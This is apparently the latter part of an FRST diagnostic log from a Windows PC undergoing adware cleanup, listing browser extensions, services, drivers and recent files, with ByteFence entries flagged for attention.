[2020-04-26] CHR Extension: (Docs) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-04-26] CHR Extension: (Google Drive) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-04-26] CHR Extension: (YouTube) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-04-26] CHR Extension: (Sheets) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-04-26] CHR Extension: (McAfee® WebAdvisor) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2020-04-26] CHR Extension: (Google Docs Offline) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-26] CHR Extension: (Search Manager) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\icmgebopaejnjlncllgmcenbbflikfjd [2020-04-26] CHR Extension: (Chrome Web Store Payments) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-04-26] CHR Extension: (Gmail) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-04-26] CHR Extension: (Chrome Media Router) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-26] CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx CHR HKU\S-1-5-21-4079176776-4138653130-3161291867-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [icmgebopaejnjlncllgmcenbbflikfjd] CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx ==================== Services (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc. -> Apple Inc.) R2 Atheros Bt&Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [146592 2011-04-29] (Atheros Communications Inc. -> Atheros) [File not signed] R2 ByteFenceService; C:\Program Files\ByteFence\ByteFenceService.exe [163296 2020-02-17] (Byte Technologies LLC -> Byte Technologies LLC) <==== ATTENTION S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1468608 2016-10-06] (Disc Soft Ltd -> Disc Soft Ltd) S2 FreemakeVideoCapture; C:\Program Files (x86)\Freemake\CaptureLib\CaptureLibService.exe [9216 2017-04-28] (Ellora Assets Corp.) [File not signed] R2 IconMan_R; C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2361344 2011-03-29] (Realsil Microelectronics Inc.) [File not signed] R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [916712 2020-04-26] (McAfee, LLC -> McAfee, LLC) R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_20_1\McApExe.exe [758864 2020-02-05] (McAfee, LLC. -> McAfee, LLC) R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\3.4.105.0\\McCSPServiceHost.exe [2687856 2020-01-25] (McAfee, LLC. -> McAfee, LLC.) S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [639048 2020-01-08] (McAfee, Inc. -> McAfee, LLC) R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [639048 2020-01-08] (McAfee, Inc. -> McAfee, LLC) R3 mfevtp; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [639048 2020-01-08] (McAfee, Inc. -> McAfee, LLC) R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1737992 2020-02-06] (McAfee, LLC -> McAfee, LLC.) R2 PEFService; C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe [1373912 2020-02-04] (McAfee, LLC. -> McAfee, LLC.) R2 rtop; C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe [297288 2018-04-12] (Byte Technologies LLC -> Byte Technologies LLC.) <==== ATTENTION S3 VCFw; C:\Program Files (x86)\Common Files\Sony Shared\VAIO Content Folder Watcher\VCFw.exe [887000 2011-01-20] (Sony Corporation -> Sony Corporation) S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\NisSrv.exe [3917016 2018-10-24] (Microsoft Corporation -> Microsoft Corporation) S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MsMpEng.exe [114208 2018-10-24] (Microsoft Corporation -> Microsoft Corporation) R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000 S2 SampleCollector; "C:\Program Files\Sony\VAIO Care\VCPerfService.exe" "/service" "/sstates" "/sampleinterval=5000" "/procinterval=5" "/dllinterval=120" "/counter=\Processor(_Total)\% Processor Time:1/counter=\PhysicalDisk(_Total)\Disk Bytes/sec:1" "/counter=\Network Interface(*)\Bytes Total/sec:1" "/expandcounter=\Processor Information(*)\Processor Frequency:1" "/expandcounter=\Processor(*)\% Idle Time:1" "/expandcounter=\Processor(*)\% C1 Time:1" "/expandcounter=\Processor(*)\% C2 Time:1" "/expandcounter=\Processor(*)\% C3 Time:1" "/expandcounter=\Processor(*)\% Processor Time:1" "/directory=C:\ProgramData\Sony Corporation\VAIO Care\inteldata" S3 SpfService; "C:\Program Files\Common Files\Sony Shared\VAIO Entertainment Platform\SPF\SpfService64.exe" [X] S3 VcmIAlzMgr; "C:\Program Files\Sony\VCM Intelligent Analyzing Manager\VcmIAlzMgr.exe" [X] S3 VcmINSMgr; "C:\Program Files\Sony\VCM Intelligent Network Service Manager\VcmINSMgr.exe" [X] S3 VCService; "C:\Program Files\Sony\VAIO Care\VCService.exe" [X] S2 VSNService; "C:\Program Files\Sony\VAIO Smart Network\VSNService.exe" [X] ===================== Drivers (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 athr; C:\WINDOWS\System32\drivers\athwnx.sys [4233728 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Communications, Inc.) R3 BtFilter; C:\WINDOWS\system32\DRIVERS\btfilter.sys [610336 2016-07-13] (Microsoft Windows Hardware Compatibility Publisher -> Qualcomm Atheros) R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [75896 2020-01-15] (McAfee, Inc. -> McAfee, LLC) R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-11-05] (Disc Soft Ltd -> Disc Soft Ltd) R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-11-05] (Disc Soft Ltd -> Disc Soft Ltd) S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [217912 2019-06-04] (McAfee, LLC -> McAfee, Inc.) R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [527272 2020-01-15] (McAfee, Inc. -> McAfee, LLC) R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [380840 2020-01-15] (McAfee, Inc. -> McAfee, LLC) S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85920 2020-01-15] (Microsoft Windows Early Launch Anti-malware Publisher -> McAfee, LLC) R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [521128 2020-01-15] (McAfee, Inc. -> McAfee, LLC) R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [997800 2020-01-15] (McAfee, Inc. -> McAfee, LLC) R3 mfencbdc; C:\WINDOWS\system32\DRIVERS\mfencbdc.sys [594360 2019-12-23] (McAfee, Inc. -> McAfee LLC.) S3 mfencrk; C:\WINDOWS\system32\DRIVERS\mfencrk.sys [107960 2019-12-23] (McAfee, Inc. -> McAfee LLC.) R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [116856 2020-01-15] (McAfee, Inc. -> McAfee, LLC) S3 mferkdet; C:\WINDOWS\System32\drivers\mferkdet.sys [94864 2010-10-13] (McAfee, Inc. -> McAfee, Inc.) R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [252328 2020-01-15] (McAfee, Inc. -> McAfee, LLC) S3 NPF; C:\WINDOWS\System32\drivers\NPF.sys [35344 2011-02-11] (CACE Technologies, Inc. -> CACE Technologies, Inc.) R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvszqwu.inf_amd64_a144391d0dbf02c6\nvlddmkm.sys [14456920 2017-05-18] (NVIDIA Corporation -> NVIDIA Corporation) R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [604160 2018-04-12] (Microsoft Windows -> Realtek ) R3 SFEP; C:\WINDOWS\System32\drivers\SFEP.sys [12032 2010-04-26] (Microsoft Windows Hardware Compatibility Publisher -> Sony Corporation) S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [46184 2018-10-24] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [328696 2018-10-24] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [60408 2018-10-24] (Microsoft Windows -> Microsoft Corporation) U3 idsvc; no ImagePath ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) =================== (If an entry is included in the fixlist, the file/folder will be moved.) 2020-04-26 17:25 - 2020-04-26 17:28 - 000035577 _____ C:\Users\zabol\Downloads\FRST.txt 2020-04-26 17:24 - 2020-04-26 17:27 - 000000000 ____D C:\FRST 2020-04-26 17:21 - 2020-04-26 17:21 - 002282496 _____ (Farbar) C:\Users\zabol\Downloads\FRST64.exe 2020-04-26 16:59 - 2020-04-26 17:05 - 000000000 ____D C:\AdwCleaner 2020-04-26 16:58 - 2020-04-26 16:58 - 008196784 _____ (Malwarebytes) C:\Users\zabol\Downloads\AdwCleaner.exe 2020-04-26 15:40 - 2020-04-26 15:40 - 000000000 ___HD C:\$WINDOWS.~BT 2020-04-26 15:17 - 2020-04-26 15:17 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk 2020-04-26 15:17 - 2020-04-26 15:17 - 000000993 _____ C:\Users\Public\Desktop\Firefox.lnk 2020-04-26 15:17 - 2020-04-26 15:17 - 000000993 _____ C:\ProgramData\Desktop\Firefox.lnk 2020-04-26 15:17 - 2020-04-26 15:17 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla 2020-04-26 15:17 - 2020-04-26 15:17 - 000000000 ____D C:\Users\zabol\Desktop\Old Firefox Data 2020-04-26 15:17 - 2020-04-26 15:17 - 000000000 ____D C:\Program Files\Mozilla Firefox 2020-04-26 14:44 - 2020-04-26 14:44 - 000046807 _____ C:\Users\zabol\Desktop\bookmarks-2020-04-26.json 2020-04-26 14:37 - 2020-04-26 14:37 - 000132836 _____ C:\Users\zabol\Documents\cc_20200426_143719.reg 2020-04-26 14:36 - 2020-04-26 14:36 - 000000000 ____D C:\Users\zabol\AppData\Local\luminati 2020-04-26 12:51 - 2020-04-26 12:51 - 000003936 _____ C:\WINDOWS\system32\Tasks\CCleaner Update 2020-04-26 12:51 - 2020-04-26 12:51 - 000000863 _____ C:\Users\Public\Desktop\CCleaner.lnk 2020-04-26 12:51 - 2020-04-26 12:51 - 000000863 _____ C:\ProgramData\Desktop\CCleaner.lnk 2020-04-26 12:51 - 2020-04-26 12:51 - 000000000 ____D C:\Users\zabol\AppData\Local\Google 2020-04-26 12:50 - 2020-04-26 14:36 - 000000000 ____D C:\Program Files (x86)\Google 2020-04-26 12:49 - 2020-04-26 12:49 - 022267336 _____ (Piriform Software Ltd) C:\Users\zabol\Downloads\ccsetup565.exe 2020-04-20 22:31 - 2019-03-28 07:35 - 000087296 _____ (Microsoft Corporation) C:\WINDOWS\system32\vcruntime140_clr0400.dll 2020-04-20 22:30 - 2019-03-28 10:11 - 000029232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aspnet_counters.dll 2020-04-20 22:30 - 2019-03-28 10:11 - 000017968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr100_clr0400.dll 2020-04-20 22:30 - 2019-03-28 10:09 - 000032816 _____ (Microsoft Corporation) C:\WINDOWS\system32\aspnet_counters.dll 2020-04-20 22:30 - 2019-03-28 10:09 - 000017968 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr100_clr0400.dll 2020-04-20 22:30 - 2019-03-28 07:35 - 000772176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase_clr0400.dll 2020-04-20 22:30 - 2019-03-28 07:35 - 000702400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase_clr0400.dll 2020-04-20 22:30 - 2019-03-28 07:35 - 000622832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp140_clr0400.dll 2020-04-20 22:30 - 2019-03-28 07:35 - 000433448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp140_clr0400.dll 2020-04-20 22:30 - 2019-03-28 07:35 - 000083768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vcruntime140_clr0400.dll 2020-04-20 21:16 - 2020-04-20 21:16 - 000002059 _____ C:\Users\Public\Desktop\McAfee LiveSafe.lnk 2020-04-20 21:16 - 2020-04-20 21:16 - 000002059 _____ C:\ProgramData\Desktop\McAfee LiveSafe.lnk 2020-04-20 21:14 - 2019-06-04 04:13 - 000217912 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\HipShieldK.sys 2020-04-20 21:13 - 2020-04-20 21:13 - 000003332 _____ C:\WINDOWS\system32\Tasks\McAfeeLogon 2020-04-20 21:11 - 2020-04-20 21:15 - 000000000 ____D C:\Program Files (x86)\McAfee 2020-04-20 21:11 - 2020-04-20 21:12 - 000000000 ____D C:\Program Files\McAfee.com 2020-04-20 21:11 - 2020-04-20 21:11 - 000003706 _____ C:\WINDOWS\system32\Tasks\McAfee Remediation (Prepare) 2020-04-20 21:11 - 2020-04-20 21:11 - 000000000 ____D C:\Program Files\Common Files\AV 2020-04-20 21:08 - 2020-01-08 23:03 - 000554288 _____ (McAfee, LLC) C:\WINDOWS\system32\mfevtps.exe 2020-04-20 20:59 - 2020-04-20 21:00 - 042627888 _____ (McAfee, LLC.) C:\Users\zabol\Downloads\McAfee_Installer_serial_fgZ0uSpo4qFbMjC24tAzwQ2_key_affid_1267_akey.exe 2020-04-20 20:58 - 2020-04-20 20:58 - 000000000 ___HD C:\$GetCurrent ==================== One month (modified) ================== (If an entry is included in the fixlist, the file/folder will be moved.) 2020-04-26 17:24 - 2017-05-13 10:08 - 000000000 ____D C:\Program Files\ByteFence 2020-04-26 17:22 - 2018-12-25 21:08 - 000004158 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{75B4F929-F045-4013-B837-01B360456D94} 2020-04-26 17:20 - 2018-04-12 00:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2020-04-26 17:14 - 2016-11-27 10:05 - 000000000 ____D C:\Users\zabol\AppData\LocalLow\Mozilla 2020-04-26 17:09 - 2018-12-25 21:08 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2020-04-26 17:09 - 2017-08-22 15:23 - 000000000 ____D C:\ProgramData\NVIDIA 2020-04-26 17:08 - 2018-04-11 22:04 - 000524288 _____ C:\WINDOWS\system32\config\BBI 2020-04-26 17:05 - 2018-12-25 21:08 - 000000000 ____D C:\WINDOWS\system32\Tasks\SONY 2020-04-26 17:05 - 2016-09-28 17:56 - 000000000 ____D C:\ProgramData\BSD 2020-04-26 17:05 - 2016-03-21 21:11 - 000000000 ____D C:\Program Files\Common Files\Sony Shared 2020-04-26 17:05 - 2016-03-21 21:11 - 000000000 ____D C:\Program Files (x86)\Sony 2020-04-26 17:05 - 2016-03-21 20:51 - 000000000 ____D C:\Program Files\Sony 2020-04-26 16:46 - 2017-05-13 10:01 - 000000000 ____D C:\Users\zabol\Desktop\pulpit 2020-04-26 16:45 - 2016-03-21 21:12 - 000000000 ____D C:\ProgramData\McAfee 2020-04-26 16:38 - 2019-05-23 20:38 - 000000000 ____D C:\WINDOWS\Minidump 2020-04-26 16:16 - 2018-04-12 00:36 - 000000000 ____D C:\WINDOWS\INF 2020-04-26 16:10 - 2018-12-25 20:25 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2020-04-26 16:03 - 2018-10-12 22:01 - 000000000 ____D C:\Users\zabol\AppData\Roaming\vlc 2020-04-26 16:02 - 2019-01-12 23:28 - 000000000 ____D C:\Users\zabol\new torrent 2020-04-26 15:41 - 2019-05-25 15:06 - 000000000 ____D C:\WINDOWS\Panther 2020-04-26 15:26 - 2018-12-25 21:08 - 000000000 ____D C:\WINDOWS\system32\Tasks\McAfee 2020-04-26 15:17 - 2016-03-22 20:19 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2020-04-26 14:30 - 2018-10-12 19:07 - 000000151 _____ C:\Users\zabol\AppData\Roaming\WB.CFG 2020-04-26 14:00 - 2016-03-22 21:19 - 000000000 ____D C:\zabol 2020-04-26 12:59 - 2016-03-23 13:19 - 000000000 ____D C:\Users\zabol\AppData\Roaming\uTorrent 2020-04-26 12:51 - 2016-10-28 10:04 - 000000000 ____D C:\Program Files\CCleaner 2020-04-26 12:35 - 2018-12-25 20:54 - 000968400 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2020-04-26 12:32 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\AppReadiness 2020-04-26 12:02 - 2018-04-12 00:38 - 000000000 ___HD C:\Program Files\WindowsApps 2020-04-26 11:46 - 2020-02-03 20:18 - 000000000 ____D C:\Windows10Upgrade 2020-04-20 22:37 - 2018-04-12 00:30 - 000000000 ____D C:\WINDOWS\CbsTemp 2020-04-20 22:24 - 2016-03-24 01:32 - 000000000 ____D C:\WINDOWS\system32\MRT 2020-04-20 22:18 - 2016-03-24 01:32 - 121542864 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2020-04-20 22:16 - 2019-11-22 14:30 - 000002407 _____ C:\Users\zabol\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2020-04-20 22:16 - 2018-12-25 21:08 - 000003370 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4079176776-4138653130-3161291867-1000 2020-04-20 22:16 - 2016-03-22 18:17 - 000000000 ___RD C:\Users\zabol\OneDrive 2020-04-20 21:17 - 2018-04-11 22:04 - 000008192 _____ C:\WINDOWS\system32\config\ELAM 2020-04-20 21:16 - 2018-02-03 22:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee 2020-04-20 21:16 - 2017-06-09 21:32 - 000000000 ____D C:\Program Files\McAfee 2020-04-20 21:14 - 2017-06-14 14:50 - 000000000 ____D C:\Program Files\Common Files\McAfee 2020-04-20 21:09 - 2018-04-12 00:38 - 000000000 ___HD C:\WINDOWS\ELAMBKUP 2020-04-20 20:25 - 2018-12-25 20:39 - 000000000 ____D C:\Users\zabol 2020-04-20 20:21 - 2015-10-30 07:28 - 000000000 ____D C:\Users\Default.migrated 2020-04-01 15:25 - 2019-12-10 14:55 - 000000000 ____D C:\Program Files\CUAssistant ==================== Files in the root of some directories ======== 2016-05-13 00:40 - 2016-05-13 00:40 - 006748160 _____ () C:\Program Files (x86)\GUT5E3E.tmp 2018-10-12 19:07 - 2020-04-26 14:30 - 000000151 _____ () C:\Users\zabol\AppData\Roaming\WB.CFG ==================== SigCheck ============================ (There is no automatic fix for files that do not pass verification.) ==================== End of FRST.txt ========================